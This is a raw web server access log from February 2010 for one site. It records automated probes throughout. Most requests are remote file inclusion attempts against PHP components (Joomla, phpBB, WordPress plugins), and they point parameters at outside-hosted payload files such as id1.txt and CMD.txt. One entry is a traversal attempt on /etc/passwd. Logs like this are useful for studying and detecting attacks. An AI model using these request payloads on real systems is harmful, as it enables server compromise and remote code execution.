210.116.103.96 - - [08/Feb/2010:08:47:29 -0800] "GET /logs/index.php?redir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.96 - - [08/Feb/2010:08:47:29 -0800] "GET /logs/access_100119.log%20%20/index.php?redir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [08/Feb/2010:08:47:29 -0800] "GET /logs/access_100121.log%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.96 - - [08/Feb/2010:08:47:29 -0800] "GET /index.php?redir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [08/Feb/2010:08:47:30 -0800] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [08/Feb/2010:08:47:31 -0800] "GET /logs/access_100119.log%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.96 - - [08/Feb/2010:08:47:31 -0800] "GET /logs/access_100123.log%20%20/index.php?redir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [08/Feb/2010:08:47:31 -0800] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [08/Feb/2010:08:47:41 -0800] "GET /logs/access_100121.log%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.55.175.82 - - [08/Feb/2010:08:47:57 -0800] "GET //image_upload.php?sbp=http://www.bangkokcrystal.com/_admin/uploadfiles/files/pro/CMD.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
74.55.175.82 - - [08/Feb/2010:08:47:57 -0800] "GET /logs/access_100112.log///image_upload.php?sbp=http://www.bangkokcrystal.com/_admin/uploadfiles/files/pro/CMD.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
74.55.175.82 - - [08/Feb/2010:08:47:57 -0800] "GET /logs///image_upload.php?sbp=http://www.bangkokcrystal.com/_admin/uploadfiles/files/pro/CMD.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
74.55.175.82 - - [08/Feb/2010:08:47:58 -0800] "GET /logs/access_100111.log///image_upload.php?sbp=http://www.bangkokcrystal.com/_admin/uploadfiles/files/pro/CMD.txt???? HTTP/1.0" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
118.129.166.178 - - [08/Feb/2010:08:48:05 -0800] "GET /logs//delete_comment.php?board_skin_path=http://kjmed.net/bbs/idfx1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.178 - - [08/Feb/2010:08:48:05 -0800] "GET /logs/access_100202.log%20%20//delete_comment.php?board_skin_path=http://kjmed.net/bbs/idfx1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.178 - - [08/Feb/2010:08:48:05 -0800] "GET /delete_comment.php?board_skin_path=http://kjmed.net/bbs/idfx1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
189.6.218.57 - - [08/Feb/2010:08:48:07 -0800] "GET /logs//delete_comment.php?board_skin_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
189.6.218.57 - - [08/Feb/2010:08:48:07 -0800] "GET /delete_comment.php?board_skin_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
189.6.218.57 - - [08/Feb/2010:08:48:07 -0800] "GET /logs/access_100202.log%20%20//delete_comment.php?board_skin_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
189.6.218.57 - - [08/Feb/2010:08:49:09 -0800] "GET /logs/access_100130.log%20%20//delete_comment.php?board_skin_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.90.101.2 - - [08/Feb/2010:08:49:12 -0800] "GET /logs/access_100115.log//?_zb_path=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.822" "www.puaga.com"
118.129.166.178 - - [08/Feb/2010:08:49:19 -0800] "GET /logs/access_100130.log%20%20//delete_comment.php?board_skin_path=http://kjmed.net/bbs/idfx1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.251.165.181 - - [08/Feb/2010:08:49:56 -0800] "GET /logs/access_100103.log//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://www.bok4u.com/board/icon/private_icon/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
189.6.218.57 - - [08/Feb/2010:08:50:13 -0800] "GET /errors.php?error=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
189.6.218.57 - - [08/Feb/2010:08:50:13 -0800] "GET /logs/access_100127.log/errors.php?error=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
189.6.218.57 - - [08/Feb/2010:08:50:13 -0800] "GET /logs/errors.php?error=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
201.28.110.99 - - [08/Feb/2010:08:51:19 -0800] "GET /logs/access_100130.log%20%20//delete_comment.php?board_skin_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.96 - - [08/Feb/2010:08:51:42 -0800] "GET /logs/access_100123.log/index.php?redir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.96 - - [08/Feb/2010:08:51:43 -0800] "GET /logs/access_100119.log/index.php?redir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.55.175.82 - - [08/Feb/2010:08:51:43 -0800] "GET /logs/access_100104.log%20///image_upload.php?sbp=http://www.bangkokcrystal.com/_admin/uploadfiles/files/pro/CMD.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
201.28.110.99 - - [08/Feb/2010:08:52:16 -0800] "GET /errors.php?error=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
201.28.110.99 - - [08/Feb/2010:08:52:16 -0800] "GET /logs/access_100127.log/errors.php?error=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
201.28.110.99 - - [08/Feb/2010:08:52:16 -0800] "GET /logs/errors.php?error=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
189.6.218.57 - - [08/Feb/2010:08:53:16 -0800] "GET /logs/access_100127.log%20%20/errors.php?error=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.82.114.106 - - [08/Feb/2010:08:53:38 -0800] "GET /logs/access_100111.log//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.82.114.106 - - [08/Feb/2010:08:53:43 -0800] "GET /logs/access_100110.log//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
189.6.218.57 - - [08/Feb/2010:08:53:50 -0800] "GET /logs/access_100107.log%20%20/errors.php?error=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.96.156.164 - - [08/Feb/2010:08:56:24 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.96.156.164 - - [08/Feb/2010:08:56:24 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.96.156.164 - - [08/Feb/2010:08:56:24 -0800] "GET /logs/access_100117.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.96.156.164 - - [08/Feb/2010:08:56:29 -0800] "GET /logs/access_100117.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.96.156.164 - - [08/Feb/2010:08:56:29 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.96.156.164 - - [08/Feb/2010:08:56:29 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://musicadelibreria.net/footer?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.96.156.164 - - [08/Feb/2010:08:56:33 -0800] "GET /logs/access_100129.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.219.151 - - [08/Feb/2010:08:56:34 -0800] "GET /logs//write_update.php?board_skin_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.219.151 - - [08/Feb/2010:08:56:34 -0800] "GET /write_update.php?board_skin_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.219.151 - - [08/Feb/2010:08:56:35 -0800] "GET /logs/access_100202.log%20%20//write_update.php?board_skin_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
189.6.218.57 - - [08/Feb/2010:08:56:36 -0800] "GET /includes/mx_functions_ch.php?phpbb_root_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
189.6.218.57 - - [08/Feb/2010:08:56:36 -0800] "GET /logs//includes/mx_functions_ch.php?phpbb_root_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
189.6.218.57 - - [08/Feb/2010:08:56:36 -0800] "GET /logs/access_100201.log%20%20//includes/mx_functions_ch.php?phpbb_root_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.96.156.164 - - [08/Feb/2010:08:57:13 -0800] "GET /logs/access_100129.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
189.6.218.57 - - [08/Feb/2010:08:57:21 -0800] "GET /logs/access_100112.log%20%20//includes/mx_functions_ch.php?phpbb_root_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [08/Feb/2010:08:57:35 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.leiterschaft.de/cms/public/lengkap/idshy.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [08/Feb/2010:08:57:35 -0800] "GET /logs/access_100114.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.leiterschaft.de/cms/public/lengkap/idshy.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [08/Feb/2010:08:57:35 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.leiterschaft.de/cms/public/lengkap/idshy.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.219.151 - - [08/Feb/2010:08:58:20 -0800] "GET /write_update.php?board_skin_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.219.151 - - [08/Feb/2010:08:58:20 -0800] "GET /logs/access_100131.log//write_update.php?board_skin_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.219.151 - - [08/Feb/2010:08:58:20 -0800] "GET /logs//write_update.php?board_skin_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.17.109.216 - - [08/Feb/2010:08:58:35 -0800] "GET /php/delete_all.php?include_class=http://www.wvblazers.com//administrator/components/com_virtuemart/sql/other/c1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.17.109.216 - - [08/Feb/2010:08:58:35 -0800] "GET /logs//php/delete_all.php?include_class=http://www.wvblazers.com//administrator/components/com_virtuemart/sql/other/c1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.17.109.216 - - [08/Feb/2010:08:58:35 -0800] "GET /logs/access_100203.log//php/delete_all.php?include_class=http://www.wvblazers.com//administrator/components/com_virtuemart/sql/other/c1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.17.109.216 - - [08/Feb/2010:08:58:43 -0800] "GET /logs/access_100203.log//php/delete_all.php?include_class=http://www.wvblazers.com//administrator/components/com_virtuemart/sql/other/c1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.17.109.216 - - [08/Feb/2010:08:58:43 -0800] "GET /php/delete_all.php?include_class=http://www.wvblazers.com//administrator/components/com_virtuemart/sql/other/c1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.17.109.216 - - [08/Feb/2010:08:58:43 -0800] "GET /logs//php/delete_all.php?include_class=http://www.wvblazers.com//administrator/components/com_virtuemart/sql/other/c1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
189.6.218.57 - - [08/Feb/2010:08:58:49 -0800] "GET /logs/access_100202.log//delete_comment.php?board_skin_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.17.109.216 - - [08/Feb/2010:08:58:58 -0800] "GET /logs/access.log//php/delete_all.php?include_class=http://www.wvblazers.com//administrator/components/com_virtuemart/sql/other/c1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.219.151 - - [08/Feb/2010:08:59:01 -0800] "GET /logs/access_100202.log//write_update.php?board_skin_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.219.151 - - [08/Feb/2010:08:59:01 -0800] "GET /logs//write_update.php?board_skin_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.219.151 - - [08/Feb/2010:08:59:01 -0800] "GET /write_update.php?board_skin_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
201.36.173.93 - - [08/Feb/2010:08:59:02 -0800] "GET /includes/mx_functions_ch.php?phpbb_root_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.17.109.216 - - [08/Feb/2010:08:59:05 -0800] "GET /logs/access.log//php/delete_all.php?include_class=http://www.wvblazers.com//administrator/components/com_virtuemart/sql/other/c1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
201.36.173.93 - - [08/Feb/2010:08:59:07 -0800] "GET /logs/access_100201.log%20%20//includes/mx_functions_ch.php?phpbb_root_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.17.109.216 - - [08/Feb/2010:08:59:19 -0800] "GET /php/delete_all.php?include_class=http://www.wvblazers.com//administrator/components/com_virtuemart/sql/other/c1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.17.109.216 - - [08/Feb/2010:08:59:19 -0800] "GET /logs//php/delete_all.php?include_class=http://www.wvblazers.com//administrator/components/com_virtuemart/sql/other/c1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.17.109.216 - - [08/Feb/2010:08:59:20 -0800] "GET /logs/access_100121.log//php/delete_all.php?include_class=http://www.wvblazers.com//administrator/components/com_virtuemart/sql/other/c1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.17.109.216 - - [08/Feb/2010:08:59:20 -0800] "GET /logs/access_100202.log//php/delete_all.php?include_class=http://www.wvblazers.com//administrator/components/com_virtuemart/sql/other/c1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.17.109.216 - - [08/Feb/2010:08:59:23 -0800] "GET /php/delete_all.php?include_class=http://www.wvblazers.com//administrator/components/com_virtuemart/sql/other/c1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.17.109.216 - - [08/Feb/2010:08:59:23 -0800] "GET /logs//php/delete_all.php?include_class=http://www.wvblazers.com//administrator/components/com_virtuemart/sql/other/c1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.17.109.216 - - [08/Feb/2010:08:59:23 -0800] "GET /logs/access_100121.log//php/delete_all.php?include_class=http://www.wvblazers.com//administrator/components/com_virtuemart/sql/other/c1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.17.109.216 - - [08/Feb/2010:08:59:25 -0800] "GET /logs/access_100202.log//php/delete_all.php?include_class=http://www.wvblazers.com//administrator/components/com_virtuemart/sql/other/c1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [08/Feb/2010:08:59:50 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [08/Feb/2010:08:59:50 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [08/Feb/2010:08:59:50 -0800] "GET /logs/access_100117.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
189.6.218.57 - - [08/Feb/2010:08:59:50 -0800] "GET /logs/access_100130.log//delete_comment.php?board_skin_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.96.156.164 - - [08/Feb/2010:08:59:53 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.96.156.164 - - [08/Feb/2010:08:59:53 -0800] "GET /logs/access_100117.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.96.156.164 - - [08/Feb/2010:08:59:53 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [08/Feb/2010:08:59:54 -0800] "GET /logs/access_100129.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.96.156.164 - - [08/Feb/2010:09:00:00 -0800] "GET /logs/access_100129.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.219.151 - - [08/Feb/2010:09:00:49 -0800] "GET /logs/access_100131.log//write_update.php?board_skin_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.88.25.28 - - [08/Feb/2010:09:01:57 -0800] "GET /logs/access_091221.log HTTP/1.1" 404 5258 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.puaga.com"
189.6.218.57 - - [08/Feb/2010:09:02:05 -0800] "GET /logs/access_100201.log//includes/mx_functions_ch.php?phpbb_root_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
189.6.218.57 - - [08/Feb/2010:09:02:15 -0800] "GET /logs/access_100112.log//includes/mx_functions_ch.php?phpbb_root_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.195.37.187 - - [08/Feb/2010:09:02:24 -0800] "GET /module/?D=A HTTP/1.0" 200 1362 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "puaga.com"
201.36.173.93 - - [08/Feb/2010:09:02:26 -0800] "GET /logs/access_100112.log%20%20//includes/mx_functions_ch.php?phpbb_root_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.219.151 - - [08/Feb/2010:09:05:32 -0800] "GET /logs/access_100131.log%20%20//write_update.php?board_skin_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
201.36.173.93 - - [08/Feb/2010:09:05:51 -0800] "GET /logs/access_100202.log//delete_comment.php?board_skin_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
201.36.173.93 - - [08/Feb/2010:09:05:51 -0800] "GET /logs//delete_comment.php?board_skin_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
201.28.110.99 - - [08/Feb/2010:09:05:55 -0800] "GET /logs/access_100107.log%20%20/errors.php?error=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
201.36.173.93 - - [08/Feb/2010:09:05:56 -0800] "GET /delete_comment.php?board_skin_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.201.102.68 - - [08/Feb/2010:09:05:57 -0800] "GET /logs/access_100105.log//modules/My_eGallery/public/displayCategory.php?adminpath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
201.28.110.99 - - [08/Feb/2010:09:06:13 -0800] "GET /logs/access_100112.log//includes/mx_functions_ch.php?phpbb_root_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
201.36.173.93 - - [08/Feb/2010:09:06:30 -0800] "GET /logs/access_100130.log//delete_comment.php?board_skin_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.201.102.68 - - [08/Feb/2010:09:06:36 -0800] "GET /logs/access_100114.log//modules/My_eGallery/public/displayCategory.php?adminpath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.17.109.216 - - [08/Feb/2010:09:07:36 -0800] "GET /php/delete_all.php?include_class=http://www.wvblazers.com//administrator/components/com_virtuemart/sql/other/c1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.17.109.216 - - [08/Feb/2010:09:07:36 -0800] "GET /logs//php/delete_all.php?include_class=http://www.wvblazers.com//administrator/components/com_virtuemart/sql/other/c1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.17.109.216 - - [08/Feb/2010:09:07:36 -0800] "GET /logs/access_100203.log%20%20//php/delete_all.php?include_class=http://www.wvblazers.com//administrator/components/com_virtuemart/sql/other/c1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.17.109.216 - - [08/Feb/2010:09:08:04 -0800] "GET /logs/access_100203.log%20%20//php/delete_all.php?include_class=http://www.wvblazers.com//administrator/components/com_virtuemart/sql/other/c1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.17.109.216 - - [08/Feb/2010:09:08:04 -0800] "GET /logs//php/delete_all.php?include_class=http://www.wvblazers.com//administrator/components/com_virtuemart/sql/other/c1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.17.109.216 - - [08/Feb/2010:09:08:04 -0800] "GET /php/delete_all.php?include_class=http://www.wvblazers.com//administrator/components/com_virtuemart/sql/other/c1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.17.109.216 - - [08/Feb/2010:09:08:19 -0800] "GET /logs/access.log%20%20//php/delete_all.php?include_class=http://www.wvblazers.com//administrator/components/com_virtuemart/sql/other/c1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
189.6.218.57 - - [08/Feb/2010:09:08:32 -0800] "GET /logs/access_100107.log/errors.php?error=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.12.33.30 - - [08/Feb/2010:09:08:39 -0800] "GET ////delete_all.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.12.33.30 - - [08/Feb/2010:09:08:39 -0800] "GET /logs/////delete_all.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.12.33.30 - - [08/Feb/2010:09:08:40 -0800] "GET /logs/access_100125.log/////delete_all.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.17.109.216 - - [08/Feb/2010:09:08:50 -0800] "GET /logs/access.log%20%20//php/delete_all.php?include_class=http://www.wvblazers.com//administrator/components/com_virtuemart/sql/other/c1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [08/Feb/2010:09:10:44 -0800] "GET /logs/access_100202.log/?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [08/Feb/2010:09:10:44 -0800] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.puaga.com"
